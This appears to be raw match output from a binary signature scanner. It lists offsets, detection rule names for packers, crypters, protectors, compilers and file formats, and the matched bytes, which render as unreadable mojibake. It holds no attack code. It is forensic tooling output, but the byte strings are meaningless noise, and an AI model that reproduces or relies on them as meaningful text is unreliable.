0 0x179051 CorelDraw_8_CDR_Graphics_format_Detecton_1 RIFFCDR8 None $1
0 0x17e56f CorelDraw_CMX_Graphics_format_Detecton_1 RIFFCMX1 None $1
1 0x1580a5 0x1880aa CreateInstall_2003_3_5_Detecton_1 SVWUh`P@jj؀@Ԁ@=uV@j@3h t@S t@@ None $1
0 0x1880aa CreateInstall_v2003_3_5_Detecton_1 SVWUh`P@jj؀@Ԁ@=uV@j@3h t@S t@@P@ P@h@ D$Zh-Ѐ@D$ D$ PSՍL$ Sh=̀@jSjhQ׋SD$ P@T$PQRVȀ@@P@;T$0jP@+ЋL$;P@V None $1
0 0x187572 Creative_Audio_file_Detecton_1 Creative Voice File None $1
1 0x15d86c 0x16335d Crunch_4_0_Detecton_1 U]U`+t$,Ihlٲ3P$ None $1
1 0x163831 0x19140b Crunch_5_Detecton_1 hU] U`+t$, I None $1
2 0x1601c3 0x163831 0x19140b Crunch_5_Fusion_4_Detecton_2 hU None $1
1 0x15d86c 0x16335d Crunch_PE_4_0_Detecton_1 U]U`+t$,Ihlٲ3P$ None $1
0 0x16335d Crunch_PE_v4_0_Detecton_1 U]U`+t$,Ihlٲ3P$AhI{y3PAgVQRS3I33۬2ֶ͊ffs f5 fu33Ou[fZYhD$ȋ%3 ‹%33333 ‹%UUUU3 None $1
0 0x168097 Crypto_Lock_2_02_Eng_Detecton_1 `@WFGu ru su s1Ƀr None $1
0 0x15a24d D1NS1G_Detecton_1 7 78P7h7x`DVCLAL PACKAGEINFO None $1
0 0x15f134 D1S1G_v1_1_Beta_Scrambled_EXE_Detecton_1  ÐX‰%PU0@0RÍ@USVWMEEE EAa8AeljEAiǍQm׃q +r Aр1AJuEq None $1
0 0x16ee3b D1S1G_v1_1_beta_Detecton_1  8PhxDVCLAL PACKAGEINFO None $1
1 0x156e39 0x18aca1 DEF_1_00_Eng_Detecton_1 @jY~tF @V0@Ju(h@ None $1
0 0x168b86 DEF_v1_0_Detecton_Number_2 @jY~tF @V0@Ju(h@ None $1
0 0x166a6e Dev_C_v4_Detecton_1 Uj None $1
0 0x166a85 Dev_C_v5_Detecton_1 Uj None $1
0 0x175637 DiskDupe_c_MSD_Configuration_file_Detecton_1 MSD Data Vers None $1
0 0x18533a DiskDupe_c_MSD_Users_file_Detecton_1 MSD Users Version None $1
0 0x1660bf DotFix_Nice_Protect_V2_1_Detecton_1 `t$$|$(3ۤms3ds 3[s#AOsu?M+uB(tM H,=}s swAAųV+^uF3Ar+|$(|$ a`P݃ SPj@ht$,jЉD$ a None $1
0 0x157023 Dropper_Creator_V0_1_Detecton_1 `])ō1d@0x @ p @ None $1
0 0x1570c7 dUP_2_x_Patcher_Detecton_1 ˅t:tu BIGFBI None $1
2 0x4e 0x113cf3 0x12ac4a dUP_v2_x_Patcher_Detecton_1 This program cannot be run in DOS mo None $1
1 0x16a8ae 0x1771d4 DzA_Patcher_1_3_Loader_Detecton_1 @@hH @h @RRRRRRRWu RRWR5L @jhX @RRhc@RRj5 None $1
0 0x1771d4 DzA_Patcher_v1_3_Loader_Detecton_1 @@hH @h @RRRRRRRWu RRWR5L @jhX @RRhc@RRj5H @@@@5L @t`jjjQ5H @ua`\ @jjSQ5H @ua\ @_:t5L @KjJ`_jjSQ5H @Ka5L @ j r%p0@%x None $1
0 0x167485 Elicense_System_V4_0_0_0_Detecton_1 cybelicen40.dll None $1
0 0x1536d6 EmbedPE_V1_00_V1_24_Detecton_1 KERNEL32.dllGetProcAddressGetModuleHandleALoadLibraryA None $1
0 0x1788f5 Encapsulated_Postscript_graphics_file_v2_0_EPSF_1_2_Detecton_1 %!PS-Adobe-2.0 EPSF-1.2 None $1
0 0x179ffd Encapsulated_Postscript_graphics_file_v3_0_EPSF_3_0_Detecton_1 %!PS-Adobe-3.0 EPSF-3.0 None $1
0 0x17c5a7 Encrypted_by_RSCC_286_v1_01_Detecton_1 RSCC/1.01 None $1
0 0x18abf4 Encrypted_by_RSCC_286_v1_02_Detecton_1 RSCC/1.02 None $1
0 0x154af4 EncryptPE_V2_2006_1_15_Detecton_1 EPE: EncryptPE V2.2006.1.15 None $1
1 0x15e082 0x163d6f EncryptPE_V2_2006_7_10_Detecton_1 `d5s None $1
1 0x159574 0x1595c9 Enigma_protector_1_10_unregistered_Detecton_1 `rrrrrrrrrY\9991\=X_V- z.02r+r6 3Ŝɜ͜ќ՜ٜݜ None $1
0 0x1595c9 Enigma_protector_1_10_unregistered_Detecton_Number_2 `rrrrrrrrrY\9991\=X_V- z.02r+r6 3Ŝɜ͜ќ՜ٜݜQ Ā~5 7=EMt$k>8 I'Q:Ȯ; 5 None $1
0 0x152d8d Enigma_Protector_1_X_Detecton_Number_2 VirtualAllocVirtualFreeGetModuleHandleAGetProcAddressExitProcessLoadLibraryAMessageBoxARegCloseKeySysFreeStringCreateFontAShellExecuteA None $1
0 0x15ce6c ENIGMA_Protector_V1_X_Detecton_1 Enigma protector v1 None $1
1 0x16ede6 0x17a77c EP_1_0_Detecton_1 P33ɱ$ĬĪ@<@3fPp4DHp 30000BB_^ None $1
0 0x17bc24 Erdas_LAN_GIS_Image_graphics_format_Detecton_1 HEAD74 None $1
0 0x16fcb0 Escargot_0_1_Detecton_Number_2 (esc0.1)`h+d5d%\PI41@ uX t3 F PPT_?tG3 uV׋  tKtPQPP None $1
1 0x15a999 0x1718be eXcalibur_v1_03_Detecton_1 `]jEhXa9 Excalibur (c) by forgot/uS/DFCG None $1
1 0x159c60 0x17e099 Exe_Guarder_1_8_Detecton_1 USVWuD$0%8MZt-E-E@<@xȋQ Y$ ]Y  None $1
1 0x165267 0x1652bc EXE_Shield_0_5_Detecton_1 ` ]EU]@F@ %@ XPX@ None $1
1 0x1634b1 0x180487 Exe_Shield_2_7b_Detecton_1 h@Ü`3ă[?@݋@3@fDž0@ڐ@ސ@@{@ None $1
1 0x1656c7 0x16571c EXE_Shield_V0_6_Detecton_1 ` ]EU]@^@ &@ XPX@ None $1
1 0x16b460 0x18a102 EXE_Stealth_2_5_Detecton_1 `"ExeStealth - www.webtoolmaster.com]@ @ @ None $1
1 0x16a144 0x185f66 EXE_Stealth_2_73_Detecton_1 /Shareware - ExeStealthwww.webtoolmaster.com`]'@V None $1
1 0x16a1ee 0x1866fb EXE_Stealth_2_74_Detecton_1 Shareware - ExeStealth`]'@VxC'e%c None $1
0 0x154e02 EXECryptor_2_0_2_1_protected_IAT_Detecton_1 <kernel32.dllGetModuleHandleALoadLibraryAGetProcAddressExitProcess`puser32.dllMessageBoxA None $1
0 0x177c15 EXECryptor_2_0_2_1_Detecton_1 UVWSE‹F ЉP S EjE UFE~} \Su E None $1
2 0x1678cd 0x177c1e 0x17c868 EXECryptor_2_1_17_Detecton_1 E‹F ЉP S EjE UF None $1
0 0x17c868 EXECryptor_2_1_17_Detecton_Number_2 E‹F ЉP S EjE UFE~} \Su E None $1
2 0x154e3e 0x16ab1a 0x17a36e EXECryptor_2_2_4_Detecton_Number_3 kernel32.dllGetModuleHandleALoadLibraryAGetProcAddressExitProcess None $1
0 0x160d2d EXECryptor_2_2_6_minimum_protection_Detecton_1 PhX $YE$ZWhX+ None $1
0 0x1701a9 EXECryptor_2_2_6_DLL_minimum_protection_Detecton_1 PƇ$h^3  None $1
0 0x158acc EXECryptor_2_2_x_Detecton_1  None $1
0 0x1572fa EXECryptor_2_2_2_3_compressed_code_Detecton_Number_2 X $PjhPjYRSPljX $hjPYX[C tFt8S <s% z f%ڭN%=u None $1
0 0x16f6f0 EXECryptor_2_3_9_compressed_resources_Detecton_1 QhY<˘S,`E6E  !Ub $#W, None $1
0 0x15fe21 EXECryptor_2_3_9_minimum_protection_Detecton_1 hPQj+h6Yd None $1
0 0x1661e9 EXECryptor_2_3_9_DLL_compressed_resources_Detecton_1 PhX$XEU B}4$^E3V None $1
0 0x15bf4e EXECryptor_2_3_9_DLL_minimum_protection_Detecton_1 Qh,$]EQhY $YQd0@ @ None $1
0 0x154e02 EXECryptor_2_x_Detecton_1 < None $1
0 0x15c649 EXECryptor_2_xx_compressed_resources_Detecton_1 VWS1ۉƉƒt-Jt\FF)J)2\F)J FsCtV։1^띉[_^ None $1
0 0x15c286 EXECryptor_2_xx_max_compressed_resources_Detecton_1 USWVEUƉf>JC# E1ۺC1sMEs[HtsUGMur]뢹EEtE|P None $1
0 0x15b591 EXECryptor_v1_5_3_Detecton_1 $L$ ǁ1AA1d0d None $1
0 0x156478 EXECryptor_V2_1X_Detecton_1 U None $1
0 0x168a0c EXECryptor_V2_2X_Detecton_1 ^ None $1
1 0x1553c3 0x171216 ExeSafeguard_1_0_Detecton_1 ]NGiNXYtuYߝQ"?@HGiNXYyxYQ None $1
0 0x171216 ExeSafeguard_v1_0_Detecton_1 ]NGiNXYtuYߝQ"?@HGiNXYyxYQߺ"?`MGiNXYyxYQ躣"?@GGiNXYz{YQ"?LGiNXYtuYQ躣"?+KGiNXYx None $1
0 0x1619c7 ExeSplitter_1_2_Detecton_1 d8t@UuVV^uUu v<vv`6Vv 3ҋƋ6} u None $1
0 0x162e3a ExeSplitter_1_3_Split_Method_Detecton_1 ]@fUP@S!@Sjvj@h0hj@a@Ph@e@Pa@@jhjja@@r@jP @@Pr@@r@@ @P @Pj None $1
0 0x158941 ExeSplitter_1_3_Split_Crypt_Method_Detecton_1 #VWWH fffffffffVfff&j&jfi9dff.V_ a_-djUd&~3튍i!6 ''+jneZ~Pe0FeUPe7+j߫v&f?hfffmd None $1
1 0x15314c 0x1773c0 ExeStealth_Detecton_1 XShareware-Version ExeStealth, contact support@webtoolmaster.co None $1
0 0x16c22c EXEStealth_2_76_Unregistered_Detecton_1 ExeStealth V2 Shareware None $1
0 0x1885a2 EXE_Detecton_1 SVV None $1
2 0x155879 0x1558ce 0x18c876 eXPressor_1_2_Detecton_1 USVW ExPr-v.1.2..+=tTh None $1
2 0x155879 0x1558ce 0x18c876 eXPressor_1_2_0b_Detecton_1 USVW ExPr-v.1.2..+=tTh None $1
1 0x1535c9 0x15361e eXPressor_1_4_5_1_Detecton_1 UXSVWe eXPr-v.1.4.+H =t H None $1
1 0x16d82e 0x1885b2 eXpressor_v1_0_Detecton_1 51 B None $1
4 0x15586e 0x155887 0x1558dc 0x16ff9f 0x18c884 eXPressor_v1_2_Detecton_Number_2 ExPr-v.1.2. None $1
0 0x18c876 eXPressor_v1_2_0b_Detecton_1 USVW ExPr-v.1.2..+=tThPj88\ None $1
2 0x15321e 0x153234 0x191a45 eXPressor_v1_3_Detecton_Number_2 ExPr-v.1.3. None $1
2 0x1535d9 0x15362e 0x1845a4 eXPressor_v1_4_Detecton_Number_2 eXPr-v.1.4. None $1
0 0x165040 eXPressor_Protection_1_5_0_X_Detecton_1 h SVW=tVڟhhYY None $1
0 0x165040 eXPressor_Protection_V1_5_0_X_Detecton_1 h SVW=tVڟhhYYfhY݃eE@E}asE3EM None $1
0 0x169b0f FakeNinja_v2_8_Anti_Debug_Detecton_1 d@0@td0@ttPd0hpt131+=s=t@0d򐐐d@5@@jj5p@5@% None $1
1 0x162906 0x169b90 FakeNinja_v2_8_Detecton_1 d@5@@ None $1
1 0x163469 0x196b6e FASM_1_5x_Detecton_1 j8@@ None $1
1 0x17a357 0x18534b FASM_1_5x_Detecton_1 j@@ None $1
0 0x179b10 File_Analyzer_Compiled_Datafile_Version_v3_v4_Detecton_1 File Analyzer Compiled Datafile Version None $1
0 0x179b10 File_Analyzer_Compiled_Datafile_Version_Detecton_1 File Analyzer Compiled Datafile Version None $1
0 0x17cb9e File_Analyzer_Extended_Datafile_Version_v3_v4_Detecton_1 #EXTD: None $1
0 0x17cb9e File_Analyzer_Extended_Datafile_Version_Detecton_1 #EXTD: None $1
0 0x172659 File_Analyzer_Registration_file_v1_0_Detecton_1 $FAREG$M-1 None $1
0 0x1790a3 File_Analyzer_Registration_file_v1_1_Detecton_1 $FAREG$ENC=&&REG=&&EXP= None $1
1 0x16be67 0x16db0f Fish_PE_Shield_1_01_Detecton_1 USVWE None $1
0 0x16db0f Fish_PE_Shield_1_01_Detecton_Number_2 USVWE E܃}uEU܉UUUUUUEEX]E0Nr+FE{t None $1
1 0x16be67 0x16db0f Fish_PE_Shield_1_12_1_16_Detecton_1 USVWE E None $1
0 0x16be67 Fish_PE_Shield_1_12_1_16_Detecton_Number_2 USVWE E܃}uEE܉EغN.EI2ӋETʯE3EFyE躪 |EEX]E0Nr+ None $1
1 0x15a84c 0x1757e1 FixupPak_1_20_Detecton_1 U]+Ջ3<t=<t<t<t )f<t<t f None $1
0 0x1682ce Fly_Crypter_1_0_Detecton_1 SVWU,D0DD D{(u?t3҉Ճ?u=0DDtX0DD{(u >u3C  0DD{(v>t"Ct0DDSB;Bt tP/$0DD{(uS${(t5;u=DtDPQV ^s]_^[ã0DD& None $1
0 0x181ae9 Free_Pascal_0_99_10_Detecton_1 nU} u]) None $1
1 0x1728cc 0x174b65 Free_Pascal_1_06_Detecton_1 @h None $1
0 0x174b59 Free_Pascal_1_06_Detecton_1 @t None $1
0 0x174bdc Free_Pascal_1_06_Detecton_1 @ None $1
0 0x17e6ca Free_Pascal_1_06_Detecton_1 @ None $1
0 0x172193 Free_Pascal_v1_0_10_win32_console_Detecton_1 P%U None $1
0 0x17219f Free_Pascal_v1_0_10_win32_GUI_Detecton_1 P%U None $1
0 0x164a20 FreeBASIC_0_16b_Detecton_1 U$1]ÉU$h1]ÉUE$] None $1
0 0x15439a FreeCryptor_0_1_build_001_Detecton_1 $@8th&d5d%䐋$dd$ None $1
0 0x16568f FreeCryptor_0_1_build_002_Detecton_1 $@8th'd5d%䐋$dd$ None $1
0 0x16c4e3 FreeCryptor_0_2_build_002_Detecton_1 3Ґ hPTd$XP3R@$$\$\$ utbАZ3T$dR\Z None $1
0 0x176c4a FreeJoiner_1_5_3_Stub_engine_1_7_1_Detecton_1 ֐`֐E֐“`3ɹ0tM֐3@hh@j3Ɇ֐jhjjjhh@@ None $1
0 0x18d1ba FreeJoiner_Small_build_014_015_Detecton_1 Uhh@jjhjjjhh@@@jjj5@jEPjEP5@jEPjEP None $1
0 0x175579 FreeJoiner_Small_build_017_Detecton_1 Uۆhh @jjhjjjhh @ @@jjj5 @ۆjEPjEP5 @jEPjEP None $1
0 0x174e91 FreePascal_1_0_4_Win32_Detecton_1 UU1fՉ--1] None $1
0 0x171f9c FreePascal_1_0_4_Win32_DLL_Detecton_1 USVW}=} =}=_^[] None $1
0 0x174bd9 FreePascal_2_0_0_Win32_Detecton_1 U@jd5p@U1 @fՉ-0@1r] None $1
0 0x174c63 FreePascal_2_0_0_Win32_Detecton_1 Ujd5U1fՉ-1] None $1
1 0x168224 0x18f193 FSG_1_00_Eng_Detecton_1 @@S uFj[$s3$s3$s!A$su?C+u8 None $1
1 0x168a35 0x17e1c0 FSG_1_20_Eng_Detecton_1  ƍ  Y7 * s2#[V{ None $1
1 0x15656a 0x181f5f FSG_1_20_Eng_Detecton_Number_2 5þ"hC"_3+ǀzA<Ϯƫ,2 ˁ None $1
1 0x1632f2 0x187d08 FSG_1_20_Eng_Detecton_Number_3  Zލ58L "3&Zo  None $1
1 0x15dc77 0x183cc1 FSG_1_20_Eng_Detecton_Number_4 3,=~EEXh ^@h,[Ɋ*LXS* None $1
1 0x15425a 0x175b1e FSG_1_20_Eng_Detecton_Number_5  53h~} [#hw~}_X3?X /* /R2Ӏ̀ None $1
1 0x16c2ed 0x17f89d FSG_1_20_Eng_Detecton_Number_6  '$BI \1A ꨌ4FbY2h* None $1
1 0x15b766 0x188480 FSG_1_31_Eng_Detecton_1 @@Ss3s3s#AsuBFu8(tH None $1
3 0x154190 0x176440 0x176cde 0x17dcdc FSG_1_3_Detecton_1 @@S uFòj[$s3$s3$s!A$su?C+u8 None $1
0 0x176440 FSG_v1_3_Detecton_Number_2 @@S uFòj[$s3$s3$s!A$su?C+u8(tA H"=}s swAAųV+^3AT$T$r_[;OtOt {WCCR_G7W3ut None $1
0 0x176cde FSG_v1_3_Detecton_Number_2 @@S uFòj[$s3$s3$s!A$su?C+u8(tA H"=}s swAAųV+^3AT$T$r_[;OtOt {WCCR_'G7W3ut None $1
0 0x17dcdc FSG_v1_3_Detecton_Number_2 @@S uFòj[$s3$s3$s!A$su?C+u8(tA H"=}s swAAųV+^3AT$T$r_[;OtOt {WCCR_G7W3ut None $1
0 0x16bc6e FSG_v2_0_Detecton_2 %aUs3s3sAsu None $1
1 0x165abf 0x165b14 Fuck_n_Joy_1_0c_Detecton_1 `]@t$  ,l@/@Pl@  ;@?@Pl@ None $1
1 0x1622c4 0x170169 Gleam_1_00_Detecton_1 SVW$ None $1
0 0x16ca39 GP_Install_v5_0_3_32_Detecton_1 U3QQQQQQQSVW Ak>3Uhv Ad0d GA31 3ҡ None $1
1 0x1643ec 0x16443f HASP_HL_Protection_1_X_Detecton_1 USVW`ģ+=t Qhh None $1
0 0x174b3d Histogram_graphics_file_Detecton_1 mhwanh None $1
0 0x185d40 Hitachi_Raster_Format_graphics_format_Detecton_1 CADC/KR RST None $1
1 0x15da93 0x15db8d hmimys_protect_0_1_Detecton_1 ^dPPlPPPPP None $1
1 0x15da93 0x15db8d hmimys_Packer_1_0_Detecton_1 ^dPPlPPPPP None $1
1 0x15da93 0x15db8d hmimys_Packer_1_0_Detecton_Number_2 ^dPPlPPPPP None $1
0 0x18641b HQR_data_file_Detecton_1 H None $1
0 0x17fe90 Hying_s_PE_Armor_0_75_exe_Detecton_1 VirtualAllocttKERNEL32.dllGetProcAddressGetModuleHandleALoadLibraryA`]UVU None $1
1 0x16d4b9 0x17fe90 Hying_s_PE_Armor_0_75_exe_Detecton_Number_2 VirtualAlloct None $1
1 0x1564ac 0x181b6f Hying_s_PE_Armor_0_75_exe_Detecton_Number_3 UUu None $1
0 0x17fd97 Hying_s_PE_Armor_0_76_Detecton_1 VirtualAllocVirtualFreeaYKERNEL32.dllGetProcAddressLoadLibraryAGetModuleHandleA`]UVU None $1
0 0x17e1b4 IBM_PictureMaker_graphics_file_Detecton_1  None $1
0 0x17d579 Img_Software_Set_graphics_file_Detecton_1 SCMI 1AT None $1
0 0x19070a IMP_Packer_1_0_Detecton_1 (@4L\KERNEL32.dllGetProcAddressLoadLibraryA None $1
1 0x153d83 0x19070a IMP_Packer_1_0_Detecton_Number_2 (@4L\KERNEL32.dllGetProc None $1
0 0x16f2c7 INCrypter_0_3_INinY_Detecton_Number_2 `d0@ @ X ]M@@d@0@u@@Q>.rsrte@#@ @ "@;F r t ;F4rXuN~ @t 11GY(Iu @D$ aP None $1
0 0x1771a9 Inno_Installer_v5_1_2_Detecton_1 `X +PhhPh None $1
0 0x15cfa7 Inno_Setup_Module_v2_0_18_Detecton_1 UĸSVW3EEEsqڅ聧 None $1
0 0x16a424 Inno_Setup_Module_v3_0_4_beta_v3_0_6_v3_0_7_Detecton_1 UĸSVW3EEEp%l None $1
0 0x1654a0 Inno_Setup_Module_Detecton_Number_2 USVW3EEE None $1
0 0x187698 Interchange_Format_File_IFF_type_WVQA_Detecton_1 FORMWVQAVQHD None $1
0 0x17efde Interplay_s_MVE_file_Detecton_1 Interplay MVE File None $1
1 0x16bae8 0x196a62 iPBProtect_0_1_3_Detecton_1 UjhKCUFhTIHSdPd%hSVWe3ۉ]jX_^[d%dXXX]hoVP]qx None $1
0 0x196a62 iPBProtect_v0_1_3_Detecton_1 UjhKCUFhTIHSdPd%hSVWe3ۉ]jX_^[d%dXXX]hoVP]qxP[h\$H\$X\$X[LuZqxu RJqu\$3PSu $$X0qpqpqpqpqp None $1
0 0x1873d2 JAR_Archive_Detecton_1 ruJar None $1
0 0x18d681 JAR_Archive_Detecton_1 Jar None $1
0 0x15b129 KBys_Packer_0_28_Beta_Detecton_1 `^ ‹NVR‹jWWjSZYUjPQRPPjWPjS None $1
0 0x18a424 Kbys_Packer_0_28_Beta_Detecton_1 h`t$$|$(3ۤms3ds 3[s#AO None $1
0 0x15e3f5 kkrunchy_v0_17_Detecton_1 M1ҍ}0 None $1
0 0x15bc94 LamCrypt_1_0_Detecton_1 `f@Kufa None $1
1 0x1645c9 0x1869b2 LaunchAnywhere_4_0_0_1_Detecton_1 USHUPPh>Bd5d%hiDYN) ujn+Y,#.LD None $1
1 0x15f4e2 0x180bd0 Launcher_Generator_1_03_Detecton_1 h @h @jjj jjjh"@j~;h @tjh`#@h #@jX @;l @ None $1
0 0x180bd0 Launcher_Generator_v1_03_Detecton_1 h @h @jjj jjjh"@j~;h @tjh`#@h #@jX @;l @tQ\ @p!@Ëh` @S!@\ @؋p @Pp"@\ @05 @&X @@X @j%\0@%`0@%d0@%h0@%l0@%t0@ None $1
0 0x177aed Lotus_Word_Pro_document_file_Detecton_1 WordProLWP7 None $1
1 0x158f53 0x173d66 LY_WGKX_Detecton_1 MyFunbs None $1
1 0x164329 0x185ecc Macromedia_Windows_Flash_Projector_Player_5_0_Detecton_1 DVpaD<"u FF<"t tFF<"u>"uF < ~FF< t < FFuD$D$0 None $1
0 0x155cbb MarjinZ_EXE_Scrambler_SE_Detecton_1 5% jh!5|35 YEu u YajYe5|3։E5x3։EEPEPuEu5t ֣|3uփ x3E E None $1
0 0x162063 MaskPE_1_6_Detecton_1 6,$` None $1
0 0x1671bd MaskPE_V2_0_Detecton_1 d0@>6$ None $1
0 0x182b9e MASM_TASM_Detecton_Number_2 j@ None $1
0 0x19198b MASM_TASM_Detecton_Number_3 j2@ None $1
0 0x5deb MASM_TASM_sig1_h_Detecton_1 %%%%%%%% %%% None $1
0 0x5889d MASM_TASM_sig1_h_Detecton_1 %k%k%k%k%k%k%k%k%k%k%k None $1
4 0x153c91 0x15514a 0x165c76 0x16666e 0x166dd9 MASM_TASM_sig1_h_Detecton_1 %x@%|@%@%@%@%@%@%@%@%@%@ None $1
0 0x154b96 MASM_TASM_sig1_h_Detecton_1 %@%@%@%@%@%@%@%@%@%@%@ None $1
0 0x1637c8 MASM_TASM_sig1_h_Detecton_1 %%%%%%%%%%% None $1
0 0x18dc58 MASM_TASM_sig1_h_Detecton_1 %@@%@@%@@%@@%@@%@@%@@%@@%$@@%(@@%,@@ None $1
0 0x17c633 MASM_TASM_sig2_h_Detecton_1 %%%%%%%%% None $1
0 0x171cae MASM_TASM_sig4_h_Detecton_1 %%%%%%%%%%% None $1
0 0x5dec MASM_TASM_sig4_h_Detecton_Number_2 %%%%%%%% %%% None $1
23 0x5889e 0x588a4 0x588aa 0x588b0 0x588b6 0x588bc 0x588c2 0x588c8 0x588ce 0x588d4 0x588da 0x588e0 0x588e6 0x588ec 0x588f2 0x588f8 0x588fe 0x58904 0x5890a 0x58910 0x58916 0x5891c 0x58922 0x58928 MASM_TASM_sig4_h_Detecton_Number_2 %k%k%k%k%k%k%k%k%k%k%k None $1
6 0x153c92 0x15514b 0x15cbfa 0x15f20d 0x165c77 0x16666f 0x166dda MASM_TASM_sig4_h_Detecton_Number_2 %x@%|@%@%@%@%@%@%@%@%@%@ None $1
6 0x153c98 0x155151 0x15cc00 0x15f213 0x165c7d 0x166675 0x166de0 MASM_TASM_sig4_h_Detecton_Number_2 %|@%@%@%@%@%@%@%@%@%@%@ None $1
8 0x153c9e 0x155157 0x15cc06 0x15f219 0x165c83 0x16667b 0x166de6 0x16b050 0x16b056 MASM_TASM_sig4_h_Detecton_Number_2 %@%@%@%@%@%@%@%@%@%@%@ None $1
4 0x154b97 0x154b9d 0x154ba3 0x154ba9 0x154baf MASM_TASM_sig4_h_Detecton_Number_2 %@%@%@%@%@%@%@%@%@%@%@ None $1
7 0x1637c9 0x1637cf 0x1637d5 0x1637db 0x1637e1 0x1637e7 0x1637ed 0x171caf MASM_TASM_sig4_h_Detecton_Number_2 %%%%%%%%%%% None $1
0 0x1637f3 MASM_TASM_sig4_h_Detecton_Number_2 %%%%%%%%%%% None $1
0 0x18dc59 MASM_TASM_sig4_h_Detecton_Number_2 %@@%@@%@@%@@%@@%@@%@@%@@%$@@%(@@%,@@ None $1
0 0x16f414 Matrix_Dongle_Detecton_1 LoadLibraryAGetProcAddressKERNEL32.DLL[+ًL$,3+<$ +ω\$ 7GIud$d$`B)N)Z)憊c\e⣢ None $1
0 0x159d61 Metrowerks_CodeWarrior_DLL_v2_0_Detecton_1 USVWu ]tuSVun u1!SVu tu SVuGe_^[] None $1
0 0x15771d Metrowerks_CodeWarrior_v2_0_Console_Detecton_1 UUPPhd5d%h None $1
0 0x156ad3 Metrowerks_CodeWarrior_v2_0_GUI_Detecton_1 USVDUPPh@d5d%h None $1
0 0x167077 MEW_10_Detecton_1 3 @ None $1
0 0x17f431 MEW_11_SE_1_0_Detecton_1  None $1
2 0x173666 0x177881 0x17df35 MEW_11_SE_1_1_Detecton_1 None $1
0 0x179881 MEW_11_SE_1_1_Detecton_1 None $1
1 0x177881 0x17df35 MEW_11_SE_1_2_Detecton_1 None $1
2 0x173666 0x177881 0x17df35 MEW_11_SE_v1_1_Detecton_1 None $1
0 0x17df35 MEW_11_SE_v1_2_Detecton_2 None $1
0 0x174326 Microsoft_R_Full_text_index_file_Detecton_1 ll-text index None $1
0 0x1823fd Microsoft_R_Incremental_Linker_Version_5_12_8078_MASM_TASM_Detecton_1 jh0@h 0@j j% @% @ None $1
0 0x184f42 Microsoft_Access_Database_file_Detecton_1 Standard Jet DB None $1
0 0x189717 Microsoft_Resource_Cursors_file_Detecton_1   None $1
1 0x16c6ca 0x17fcf9 Microsoft_Visual_Basic_5_0_Detecton_1 0@ None $1
0 0x153920 Microsoft_Visual_Basic_v5_0_v6_0_Detecton_1 h,@0 None $1
0 0x158170 Microsoft_Visual_Basic_v5_0_v6_0_Detecton_1 h 0 None $1
0 0x16c6c3 Microsoft_Visual_Basic_v5_0_v6_0_Detecton_1 h@0 None $1
0 0x174ca9 Microsoft_Visual_Basic_v5_0_v6_0_Detecton_1 h0 None $1
0 0x17fcf2 Microsoft_Visual_Basic_v5_0_v6_0_Detecton_1 hT@0 None $1
0 0x1812a7 Microsoft_Visual_Basic_v5_0_v6_0_Detecton_Number_2 %h None $1
0 0x181e69 Microsoft_Visual_Basic_v6_0_Detecton_1 %h0 None $1
0 0x184ef6 Microsoft_Visual_C_5_0_Detecton_1 dPd%ĨSVW None $1
0 0x18a2e5 Microsoft_Visual_C_v7_0_Basic_NET_Detecton_1 % @ None $1
0 0x17ef9a Microsoft_Visual_C_5_0_7_1_Detecton_1 UhPjQj] None $1
0 0x1821c4 Microsoft_Visual_C_6_0_8_0_Detecton_1 =săPQL$-=s+ȋą@P None $1
0 0x196f0f Microsoft_Visual_C_6_0_8_0_Detecton_Number_7 D$ hY hh None $1
0 0x193b38 Microsoft_Visual_C_6_0_8_0_Detecton_Number_8 D$L$ ȋL$ u D$S؋D$d$؋D$[ None $1
0 0x176f1f Microsoft_Visual_C_6_0_DLL_Debug_Detecton_1 US]Vu W}u None $1
0 0x186326 Microsoft_Visual_C_6_0_DLL_Debug_Detecton_1 US]Vu W} None $1
0 0x176f1f Microsoft_Visual_C_6_0_DLL_Detecton_1 US]Vu W}u =&tu"t WVSЅt WVSu3N None $1
0 0x1715e4 Microsoft_Visual_C_7_0_DLL_Detecton_1 US]Vu W}u =& None $1
0 0x1855df Microsoft_Visual_C_7_0_DLL_Detecton_1 US]Vu W}u =@& None $1
0 0x18ba9a Microsoft_Visual_C_7_0_DLL_Detecton_1 US]Vu W} None $1
0 0x181a97 Microsoft_Visual_C_7_1_Detecton_1 USVWU] E@EEEECs {S t{t} vD tYVU None $1
0 0x173f7e Microsoft_Visual_C_7_1_Detecton_Number_2 UV39u } 9u 3@^] None $1
0 0x181a2c Microsoft_Visual_C_7_1_Detecton_Number_3 UV39u } h;Y0hh None $1
0 0x181a2c Microsoft_Visual_C_7_1_Detecton_Number_4 UV39u } h;Y0hhYY3@^] None $1
0 0x405 Microsoft_Visual_C_8_0_Debug_Detecton_1 °EkMTR1g&5tW iY_UeC None $1 at pe.entry_point
0 0x63a Microsoft_Visual_C_8_0_Debug_Detecton_1 hw\Rt集\,Z None $1 at pe.entry_point
0 0x63f Microsoft_Visual_C_8_0_Debug_Detecton_1 hw\Rt集\,Z None $1 at pe.entry_point
0 0x644 Microsoft_Visual_C_8_0_Debug_Detecton_1 hw\Rt集\,Zؿ None $1 at pe.entry_point
0 0x649 Microsoft_Visual_C_8_0_Debug_Detecton_1 hw\Rt集\,Zؿ None $1 at pe.entry_point
0 0x64e Microsoft_Visual_C_8_0_Debug_Detecton_1 w\Rt集\,ZؿR_ None $1 at pe.entry_point
0 0x653 Microsoft_Visual_C_8_0_Debug_Detecton_1 w\Rt集\,ZؿR_ J None $1 at pe.entry_point
0 0x658 Microsoft_Visual_C_8_0_Debug_Detecton_1 w\Rt集\,ZؿR_ J None $1 at pe.entry_point
0 0x65d Microsoft_Visual_C_8_0_Debug_Detecton_1 Rt集\,ZؿR_ J韂 None $1 at pe.entry_point
0 0x662 Microsoft_Visual_C_8_0_Debug_Detecton_1 t集\,ZؿR_ J韂n None $1 at pe.entry_point
0 0x667 Microsoft_Visual_C_8_0_Debug_Detecton_1 t集\,ZؿR_ J韂n None $1 at pe.entry_point
0 0x66c Microsoft_Visual_C_8_0_Debug_Detecton_1 集\,ZؿR_ J韂n None $1 at pe.entry_point
0 0x671 Microsoft_Visual_C_8_0_Debug_Detecton_1 \,ZؿR_ J韂n+ None $1 at pe.entry_point
0 0x676 Microsoft_Visual_C_8_0_Debug_Detecton_1 \,ZؿR_ J韂n+; None $1 at pe.entry_point
0 0x67b Microsoft_Visual_C_8_0_Debug_Detecton_1 ,ZؿR_ J韂n+; None $1 at pe.entry_point
0 0x680 Microsoft_Visual_C_8_0_Debug_Detecton_1 ZؿR_ J韂n+;h None $1 at pe.entry_point
